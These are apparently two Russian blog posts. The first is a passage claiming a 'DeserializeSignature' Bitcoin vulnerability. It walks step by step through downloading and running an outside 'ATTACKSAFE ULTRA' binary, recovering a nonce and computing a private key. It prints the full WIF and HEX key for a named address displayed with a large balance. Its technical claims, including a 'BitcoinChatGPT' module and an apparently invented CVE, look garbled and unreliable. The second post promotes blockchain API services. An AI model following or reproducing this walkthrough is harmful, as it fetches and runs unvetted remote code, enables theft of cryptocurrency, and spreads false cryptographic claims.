4. Атаки на время выполнения

Некоторые атаки могут быть основаны на анализе времени выполнения операций десериализации. Если время выполнения зависит от значений r и s, это может позволить злоумышленникам получить информацию о приватных ключах.

Далее мы рассмотрим результаты исследования, посвященного уязвимости в процессе DeserializeSignature в системе Bitcoin, а также мы рассмотрим механизмы возникновения уязвимостей, их потенциальные последствия и предлагаемые меры по их устранению.

Влияние на безопасность криптовалют

Уязвимость DeserializeSignature представляет серьёзную угрозу для безопасности криптовалют по нескольким причинам:

  1. Потеря средств: Злоумышленники могут использовать уязвимость для кражи средств с кошельков пользователей.

  2. Подрыв доверия: Успешные атаки могут подорвать доверие пользователей к безопасности криптовалют, что негативно скажется на их принятии и использовании.

  3. Сложность обнаружения: Атаки, использующие уязвимость DeserializeSignature, могут быть сложны для обнаружения и предотвращения, что делает их особенно опасными.

Методы защиты от уязвимостей DeserializeSignature

Для защиты от уязвимостей DeserializeSignature необходимо применять следующие меры:

  1. Проверка данных: Внедрение строгих проверок данных на этапе десериализации для предотвращения манипуляций.

  2. Обновление программного обеспечения: Регулярное обновление криптовалютных систем и кошельков для устранения известных уязвимостей.

  3. Аудит безопасности: Проведение регулярных аудитов безопасности для выявления и устранения потенциальных уязвимостей.

Основные цели исследования

  1. Выявление уязвимости: Определение конкретных аспектов процесса DeserializeSignature, которые могут быть уязвимы для атак.

  2. Анализ уязвимости: Оценка потенциального воздействия выявленной уязвимости на безопасность сети Bitcoin.

  3. Обзор существующих методов защиты: Изучение текущих методов и подходов, используемых для защиты процесса DeserializeSignature.

  4. Разработка рекомендаций: Предложение мер по улучшению безопасности и предотвращению возможных атак.

Методология и выявление уязвимости

Процесс DeserializeSignature в Bitcoin включает преобразование данных из одного формата в другой. В ходе этого процесса могут возникать ошибки, которые могут быть использованы злоумышленниками для проведения атак. Основной задачей на данном этапе является выявление конкретных уязвимых мест в процессе десериализации. Криптоанализ уязвимости: После выявления уязвимости необходимо провести её детальный анализ. Это включает оценку потенциального воздействия на безопасность сети Bitcoin, а также изучение возможных сценариев атак. Важно понять, каким образом злоумышленники могут использовать данную уязвимость для своих целей. Обзор существующих методов защиты: На данном этапе исследования будет проведён обзор текущих методов и подходов, используемых для защиты процесса DeserializeSignature. Это позволит определить, насколько эффективны существующие меры и какие из них могут быть улучшены.

Для устранения выявленных уязвимостей предлагается несколько мер:

  1. Обновление алгоритмов десериализации: Внедрение более строгих проверок и валидации данных на этапе DeserializeSignature.

  2. Повышение уровня тестирования: Проведение регулярных тестов безопасности с использованием различных сценариев атак.

  3. Обучение разработчиков: Повышение уровня осведомленности разработчиков о возможных уязвимостях и методах их предотвращения.

Ранее были проведены исследования, касающиеся уязвимостей в алгоритме цифровой подписи на эллиптических кривых (ECDSA), который используется в Bitcoin. Эти исследования показали, что неправильная реализация ECDSA может привести к утечке приватных ключей.

В отличие от уязвимости DeserializeSignature, проблемы с ECDSA связаны с математическими аспектами алгоритма, а не с процессом обработки данных. Другие исследования фокусировались на уязвимостях в одноранговой (P2P) сети Bitcoin. Эти уязвимости включали атаки типа “double-spending” и “Sybil-атаки”. В отличие от уязвимости DeserializeSignature, данные проблемы связаны с сетевыми аспектами и взаимодействием узлов в сети, а не с обработкой криптографических данных.

Основное различие между уязвимостью DeserializeSignature и предыдущими исследованиями заключается в природе проблемы. Уязвимость DeserializeSignature связана с обработкой данных и может быть устранена путем улучшения методов десериализации и валидации данных. В то время как уязвимости в ECDSA и P2P-сети требуют более глубоких изменений в алгоритмах и сетевых протоколах.

Кроме того, уязвимость DeserializeSignature имеет более непосредственные последствия для безопасности пользователей, так как она может быть использована для выполнения произвольного кода и компрометации системы. В то время как уязвимости в ECDSA и P2P-сети могут требовать более сложных атак и имеют более косвенные последствия. В последние годы криптовалюты, такие как Bitcoin, стали важной частью финансовой экосистемы. Однако, с ростом их популярности, увеличивается и количество выявленных уязвимостей.

Поддельные подписи ECDSA

https://github.com/demining/Deserialize-Signature-Vulnerability-in-Bitcoin-Network

Создания недействительных подписей ECDSA с помощью процесса машинного обучение BitcoinChatGPT

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/1-3WyUqipb1pXrlDjg4jxtMOG6J3MU3sa#scrollTo=B8ueObMAt5Q9&line=1&uniqifier=1

Соединим все выданные значение в одну общую строку:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100b44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307022074e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f0141045cf7dd1ad49af6957415d6b76ff39cbf78f6e72f1db9199a01127687e7230f96614ff6f0184d2191fa7428872e311fe4ddf2b91f560b30fd7dc01d2118ac0b5bffffffff01d2040000000000001976a914d74b32dfa340da479ce64aaf5e326496eb3995f188ac00000000

Откроем опцию от BlockCypher

“Decode A Transaction”:

https://live.blockcypher.com/btc/decodetx

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

Обратим внимание на Bitcoin HASH160: d74b32dfa340da479ce64aaf5e326496eb3995f1

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/demining/CryptoDeepTools/blob/f0421962be80403bb1b0877eace2c7eb70eb85bd/32DeserializeSignatureVulnerability/DecodeRawTX.txt#L31

BitcoinChatGPT создает структуру транзакции, используя HASH публичного ключа, где мы видим что Bitcoin address: 1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk отправляет 1234 satoshi на тот же адрес внутри своей сети.

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Bitcoin HASH160 был получен с помощью Python Script: wif_to_hash160.py

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

VulnerableRawTX.txt

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/demining/CryptoDeepTools/blob/main/32DeserializeSignatureVulnerability/wif_to_hash160.py

Вопрос – Ответ:

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/demining/CryptoDeepTools/blob/main/32DeserializeSignatureVulnerability/KEYFOUND.privkey

BitcoinChatGPT №2 DeserializeSignature Vulnerability Algorithm

Практическая частьЧтобы перейти к практической части создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.g...

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

requirements.txt

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и несем небольшие изменение в коде Python Script: main.py

Порядок выполнения действий на видео:

Как нам известно из prompt ответов модуля BitcoinChatGPT aлгоритм для выявление уязвимости DeserializeSignature может быть использован для нескольких вариантов решения сложных криптографических задач.

Раскрытие секретного ключа “K” (NONCE) в блокчейне Биткоина

https://colab.research.google.com/drive/1EiIIJh8UCOZZ8DVbelxhESFPvqu_xZUo

Откроем [GoogleColab]

Реализуем алгоритм с помощью нашей репозитории 32DeserializeSignatureVulnerability

!git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/32DeserializeSignatureVulnerability/

ls

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Подготовим RawTX для атаки

Теперь нам нужно получить все значение R, S, Z из всех уязвимых транзакции

Воспользуемся сервисом: https://attacksafe.ru/RSZ-Signature-From-Tx

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100b44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307022074e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f0141045cf7dd1ad49af6957415d6b76ff39cbf78f6e72f1db9199a01127687e7230f96614ff6f0184d2191fa7428872e311fe4ddf2b91f560b30fd7dc01d2118ac0b5bffffffff01d2040000000000001976a914d74b32dfa340da479ce64aaf5e326496eb3995f188ac00000000

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

RSZ-Signature-From-Tx

R = 0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307 S = 0x74e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f Z = 0xa79974cb42f82890fcebcb9865cd512a34479d91211e2ce383def10a7388cf63

Чтобы реализовать атаку и получить секретный ключ мы воспользуемся программным обеспечение “ATTACKSAFE ULTRA”

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

www.attacksafe.ru/ultra

Для необходимых пакетов библиотек для запуска программного обеспечение “ATTAKSAFE ULTRA” установим “SAGE MATH”

Команда установки:

!sudo apt-get update

!sudo apt-get install -y python3-gmpy2

!sudo apt-get install sagemath

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

!sage -v

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

С помощью утилиты wget загрузим в папку Google Colab репозитории ATTACKSAFE_ULTRA.zip

!wget https://attacksafe.ru/REPOSITORY/DC66398E76DBCD8193134381D78...

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Разархивируем репозитории ATTACKSAFE_ULTRA.zip

!unzip ATTACKSAFE_ULTRA.zip

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

ls

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

!./attacksafe -help

!./attacksafe -version

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запустим список всех скриптов для атак:

!./attacksafe -ultra

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запустим deserialization_error_vulnerability_cve-2023-0085.sage используя программное обеспечение “ATTACKSAFE ULTRA”

!./attacksafe deserialization_error_vulnerability_cve-2023-0085.sage -open RawTX.txt -save SecretKey.txt

Мы запустили данную атаку из deserialization_error_vulnerability_cve-2023-0085.sage и результат сохранился в файл SecretKey.txt

Теперь чтобы посмотреть успешный результат откроем файл SecretKey.txt

cat SecretKey.txt

Deployments ECDSA: SecretKey = 0x2863763e8ec6bf755cc152e5080e7c74a95295f06cfbe86d9cb7c37f28f1013c

RawTX = 01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100b44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307022074e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f0141045cf7dd1ad49af6957415d6b76ff39cbf78f6e72f1db9199a01127687e7230f96614ff6f0184d2191fa7428872e311fe4ddf2b91f560b30fd7dc01d2118ac0b5bffffffff01d2040000000000001976a914d74b32dfa340da479ce64aaf5e326496eb3995f188ac00000000

Мы видим надпись "Deployments ECDSA" это означает критическую уязвимость транзакции блокчейна Биткоина

SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):

K = 0x2863763e8ec6bf755cc152e5080e7c74a95295f06cfbe86d9cb7c37f28f1013c

Сделаем проверку с помощью Python-скрипта point2gen.py

Для этого установим библиотеку эллиптических кривых ECPy:

!pip3 install ECPy

Теперь запустим скрипт указав секретный ключ "K" (NONCE):

!python3 point2gen.py 0x2863763e8ec6bf755cc152e5080e7c74a95295f06cfbe86d9cb7c37f28f1013c

(0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307 , 0x3adecc9efffbb36322c8e19071e323815403be263c1e595dc26eb762982b54b0)

Проверяем координаты точки EC (secp256k1) с значением сигнатуры R

R = 0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307

S = 0x74e5feb333400732256fc44a681a1ba262b080a7cc5dfa11894e7ce4d9766c6f

Z = 0xa79974cb42f82890fcebcb9865cd512a34479d91211e2ce383def10a7388cf63

R = 0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307

point2gen = (0xb44a31bd81d3c596cc4d3776263229b6f52f2a729fbcafefffc9a0d955d46307 , 0x3adecc9efffbb36322c8e19071e323815403be263c1e595dc26eb762982b54b0)

ВСЕ ВЕРНО!

K = 0x2863763e8ec6bf755cc152e5080e7c74a95295f06cfbe86d9cb7c37f28f1013c

Теперь зная секретный ключ мы можем получить приватный ключ к Биткоин Кошельку: 1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk

Воспользуемся Python-скриптом: calculate.py > > > Получим Приватный Ключ

Откроем код и добавим все значение сигнатур K, R, S, Z

Скрипт calculate.py рассчитает приватный ключ по формуле:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Запустим скрипт:

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

PrivKey = 0506b0b7b508625dc7b0623db41206c48058ede0a9c75ff265eeb47fea29b3f0

Откроем bitaddress и проверим:

ADDR: 1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk WIF: 5HrVy4SVvC46tsuBhMhVEGHXG4AzhxtEqi4FLbia5vAXuF5GwaX HEX: 0506b0b7b508625dc7b0623db41206c48058ede0a9c75ff265eeb47fea29b3f0

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://btc1.trezor.io/address/1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk

Приватный Ключ Получен!

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Арбитраж криптовалюты, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://btc1.trezor.io/address/1LdNN9GXmoKZs5vrQFL1d4NL9GgZ1PfCZk

BALANCE: $ 819113

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

ATTACKSAFE ULTRA

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/8E2KJeWu4XA

Dzen Video Tutorial: https://dzen.ru/video/watch/664e34fc8df6514b10da09e9

Источник: https://cryptodeep.ru/deserialize-signature-vulnerability-bitcoin

Показать полностью 21 3

Blockchain-интеграция: возможности API и веб-сервисов для безопасных Биткоин транзакций

В современном мире цифровых технологий тема блокчейна приобретает все большее значение. Блокчейн-технологии обещают революцию в различных сферах экономики и информационных систем, предоставляя надежные и прозрачные способы ведения записей. Одним из ключевых аспектов внедрения и использования блокчейна в бизнесе и разработке приложений являются блокчейн API и веб-сервисы. Эти инструменты позволяют интегрировать функциональные возможности блокчейна в различные информационные системы, упрощая и ускоряя процесс взаимодействия с технологией распределенного реестра.

Цель данной статьи – осветить концепцию блокчейн API, исследовать основные типы веб-сервисов, используемых для работы с блокчейн-сетями, и проанализировать их применение в реальных бизнес-моделях. Мы рассмотрим технические аспекты интеграции блокчейн API, преимущества и недостатки различных подходов, а также потенциальные риски и вызовы, стоящие перед разработчиками и предприятиями при внедрении этих технологий.

В статье будет дан обзор ключевых платформ, поддерживающих блокчейн API, и примеры успешных кейсов, демонстрирующих эффективность их использования в различных отраслях. Особое внимание будет уделено вопросам безопасности и конфиденциальности данных при работе с блокчейн-сетями через API и веб-сервисы.

Давайте, обсудим перспективы развития блокчейн API и веб-сервисов, а также их влияние на будущее цифровой экономики и информационных технологий.

Основные типы API и их применение:

В нашей статье мы приведем практические рекомендации по работе с API различных блокчейн-платформ, таких как Bitcoin, Ethereum и др.

Одна из перспективных направлений исследований, связанных с этой темой, может включать разработку новых и усовершенствование существующих API для блокчейн-платформ, а также анализ и сравнение их эффективности и безопасности. Кроме того, возможно исследование вопросов интеграции блокчейн-API с другими системами и приложениями, а также разработка новых веб-сервисов на основе блокчейна.

Таким образом, статья может служить хорошим стартовым пунктом для исследователей, заинтересованных в этом направлении, и предоставить им полезную информацию для дальнейшего изучения темы.

Перспективами для научной исследование по теме блокчейна, API и веб-сервисов:

  1. Анализ безопасности: Исследование уязвимостей и методов защиты API, связанных с блокчейн-платформами.

  2. Улучшение производительности: Разработка новых методов оптимизации запросов к блокчейну через API для ускорения обработки данных и снижения нагрузки на сеть.

  3. Интеграция с другими технологиями: Исследование возможностей интеграции блокчейн-API с искусственным интеллектом, машинным обучением или Интернетом вещей.

  4. Кросс-платформенное использование: Анализ возможностей и проблем использования блокчейн-API в различных отраслях и средах разработки.

  5. Пользовательский опыт: Изучение того, как улучшить взаимодействие пользователей с веб-сервисами блокчейна через более интуитивно понятные и удобные API.

  6. Регуляторные и юридические аспекты: Анализ правовых вопросов и нормативных требований, связанных с использованием блокчейн-технологий через веб-сервисы.

  7. Экономические аспекты: Оценка экономического воздействия блокчейн-технологий на различные секторы экономики через API и веб-сервисы.

Классификации API и веб-сервисов, связанных с блокчейн-технологией. Для исследование блокчейна мы предлагаем систематизацию и анализ существующих решений в этой области.

По типу предоставляемого доступа:

  • Общедоступный (Public) API – доступен для всех желающих

  • Частный (Private) API – доступен только для ограниченного круга пользователей или разработчиков

  • Гибридный (Hybrid) API – комбинация общественного и частного доступа

По уровню абстракции:

  • Низкоуровневые API – предоставляют прямой доступ к базовым функциям блокчейна (например, работа с транзакциями)

  • Высокоуровневые API – абстрагируют сложные технические детали, предоставляя удобный интерфейс для разработчиков (например, библиотеки и фреймворки)

По уровню безопасности:

  • Безопасные (Secure) API – используют методы шифрования, цифровые подписи и другие меры защиты данных

  • Небезопасные (Insecure) API – не предоставляют или предоставляют ограниченные меры безопасности, требуют дополнительных мер защиты от разработчиков

По типу предоставляемой информации:

  • Публичная информация (Public data) – например, информация о блоках, транзакциях, смарт-контрактах, которая доступна всем участникам сети

  • Частная информация (Private data) – например, данные, доступные только для определенных пользователей или узлов сети

По уровню интеграции:

  • Монолитные (Monolithic) API – предоставляют широкий спектр функций в рамках одного интерфейса

  • Микросервисные (Microservices) API – представляют отдельные функциональные блоки, которые могут взаимодействовать друг с другом для выполнения сложных задач

По типу используемых данных:

  • Структурированные данные (Structured data) – например, JSON, XML

  • Неструктурированные данные (Unstructured data) – например, текстовые документы, изображения, видео

По типу предоставляемых услуг:

  1. Информационные услуги (Information services) – предоставляют данные о блокчейне, ценах на криптовалюты и т. д.

  2. Аналитические услуги (Analytical services) – предлагают инструменты для анализа данных блокчейна и прогнозирования

  3. Трансакционные услуги (Transactional services) – позволяют проводить транзакции с криптовалютами, управлять смарт-контрактами и т. д.

Эти классификации помогают систематизировать и понимать разнообразие API и веб-сервисов, связанных с блокчейн-технологией, и могут быть полезны для разработчиков, исследователей и пользователей, заинтересованных в использовании блокчейна и криптовалют.

3xpl.com – Fastest ad-free universal block explorer

Blockchain-интеграция: возможности API и веб-сервисов для безопасных Биткоин транзакций Криптовалюта, Биткоины, Информационная безопасность, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

В эпоху криптовалют, обеспечение прозрачности и доступности информации о блокчейн-транзакциях становится критически важным. Пользователи, инвесторы и разработчики нуждаются в надежных инструментах для отслеживания и анализа данных, хранящихся в блокчейне. В связи с этим, появление сервиса 3xpl.com представляет собой значительный шаг в удовлетворении этой потребности. 3xpl.com – это универсальный блокчейн-эксплорер, который предлагает пользователям возможность быстро и эффективно исследовать данные в различных блокчейнах без навязчивой рекламы и лишних задержек. В этой статье мы рассмотрим ключевые особенности и преимущества использования 3xpl.com для мониторинга криптовалютных транзакций и анализа блокчейнов, а также оценим, как этот инструмент может изменить привычные методы работы с цифровыми активами.

Если вы ищете быстрый и удобный способ исследовать блокчейн, 3xpl.com – это именно то, что вам нужно. Этот универсальный блок-эксплорер предлагает мгновенный доступ к данным блокчейна без раздражающей рекламы.

С чистым и интуитивно понятным интерфейсом 3xpl.com обеспечивает бесперебойный опыт пользователя. Вы можете легко искать транзакции, адреса и блоки по нескольким блокчейн-сетям, включая Bitcoin, Ethereum, Litecoin и многие другие.

Одна из самых впечатляющих особенностей 3xpl.com – это его скорость. Блок-эксплорер использует передовые технологии, чтобы обеспечить мгновенную загрузку страниц и быстрый доступ к данным. Это идеально подходит для трейдеров и энтузиастов криптовалют, которым нужен быстрый и надежный доступ к информации о блокчейне.

Кроме того, 3xpl.com полностью свободен от рекламы. Это означает, что вы можете сосредоточиться на анализе данных без отвлекающих факторов и ненужных задержек. Сайт имеет минималистичный дизайн, что облегчает навигацию и поиск нужной информации.

Функционал 3xpl.com включает в себя подробные сведения о транзакциях, включая время, сумму и соответствующие адреса. Вы также можете просматривать информацию о блоках, такую как размер, высоту и вознаграждение за блок. Для тех, кто хочет углубиться в детали, доступен просмотр исходного кода транзакции.

Универсальность 3xpl.com также впечатляет. Блок-эксплорер поддерживает множество криптовалют, что позволяет получать доступ к данным различных блокчейнов с одной удобной платформы. Это идеально подходит для тех, кто работает с несколькими криптовалютами или просто хочет исследовать различные сети.

Безопасность также является приоритетом для 3xpl.com. Сайт использует безопасное соединение, обеспечивая конфиденциальность и целостность ваших запросов. Вы можете быть уверены, что ваша активность и информация остаются защищенными.

Функции 3xpl.com включают в себя:

  1. Поиск по транзакциям: пользователи могут искать конкретные транзакции, используя идентификатор транзакции или адрес. Это позволяет быстро проверять статус и детали транзакции.

  2. Просмотр блоков: можно просматривать последние блоки, добытые в сети, включая информацию о размере блока, количестве транзакций и вознаграждении за блок.

  3. Статистика сети: 3xpl.com предоставляет подробную статистику сети, такую как общая хэш-скорость, количество узлов и уровень сложности. Это дает пользователям представление о состоянии и безопасности сети.

  4. Поддержка нескольких криптовалют: платформа поддерживает широкий спектр криптовалют, позволяя пользователям переключаться между ними и исследовать данные различных блокчейнов.

  5. API для разработчиков: 3xpl.com также предлагает API, который позволяет разработчикам интегрировать данные блокчейна в свои приложения или сервисы.

С 3xpl.com пользователи могут быть уверены в безопасности и конфиденциальности. Платформа не хранит личные данные пользователей и использует безопасное соединение для защиты конфиденциальности.

В целом, 3xpl.com – это мощный и удобный блок-эксплорер, который предлагает мгновенный доступ к данным блокчейна без рекламы. Его скорость, универсальность и интуитивно понятный интерфейс делают его отличным инструментом для всех, кто заинтересован в исследовании мира блокчейна. Посетите 3xpl.com сегодня, чтобы начать свое путешествие по блокчейну!

Этот скрипт предоставляет базовый интерфейс командной строки для взаимодействия с API блок-эксплорера. Пользователи могут выбирать различные опции для получения высоты блока, данных блока по высоте или данных транзакции по идентификатору. Скрипт отправляет запросы к API и выводит результаты пользователю.

Помните, что вам нужно будет заменить ‘https://3xpl.com/api’ на фактический URL API блок-эксплорера, который вы используете.

Этот скрипт можно расширить, добавив дополнительные функции, такие как поиск адреса, получение баланса аккаунта или получение списка последних блоков. Также можно добавить обработку ошибок и улучшить интерфейс пользователя.

Block.io: Bitcoin API and More

Blockchain-интеграция: возможности API и веб-сервисов для безопасных Биткоин транзакций Криптовалюта, Биткоины, Информационная безопасность, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Block.io — это многофункциональная платформа, которая предоставляет широкий спектр услуг, связанных с криптовалютами, включая API Bitcoin, кошельки и обменный сервис. Block.IO – в функциональности, который предлагает надежный и эффективный API для работы с биткойнами и другими криптовалютами. Более того, мы погрузимся в подробности использования этой платформы, ее преимущества и возможности, которые она предоставляет разработчикам и бизнесам для интеграции криптовалютных решений в свои приложения и сервисы. Безупречно поддерживаемая и постоянно улучшаемая, Block.IO заслуживает внимания всех, кто ищет надежные инструменты для криптовалютной деятельности.

API Bitcoin

API Bitcoin от Block.io позволяет разработчикам интегрировать функциональность Bitcoin в свои приложения и веб-сайты. API предоставляет полный набор функций, включая:

  • Создание и управление кошельками Bitcoin

  • Отправка и получение платежей Bitcoin

  • Отслеживание транзакций Bitcoin

  • Получение котировок цен на Bitcoin

  • Доступ к информации о блокчейне Bitcoin

API доступен через HTTP и RESTful и может использоваться с любым языком программирования.

Кошельки

Block.io предлагает различные типы кошельков для хранения Bitcoin, в том числе:

  • Горячий кошелек: онлайн-кошелек, который позволяет легко отправлять и получать Bitcoin.

  • Холодный кошелек: автономный кошелек, который обеспечивает более высокий уровень безопасности для длительного хранения.

  • Мультиподписной кошелек: кошелек, требующий нескольких подписей для совершения транзакций, что повышает безопасность.

Обменный сервис

Block.io также предоставляет обменный сервис, который позволяет пользователям обменивать Bitcoin на другие криптовалюты или фиатные валюты. Обменный сервис предлагает конкурентоспособные курсы и быстрый обмен.

Другие функции

В дополнение к основным услугам Block.io также предлагает следующие функции:

  • Подарочные карты Bitcoin: пользователи могут покупать подарочные карты Bitcoin и отправлять их друзьям и семье.

  • Интеграция с WooCommerce: плагин WooCommerce позволяет предприятиям принимать платежи Bitcoin на своих веб-сайтах.

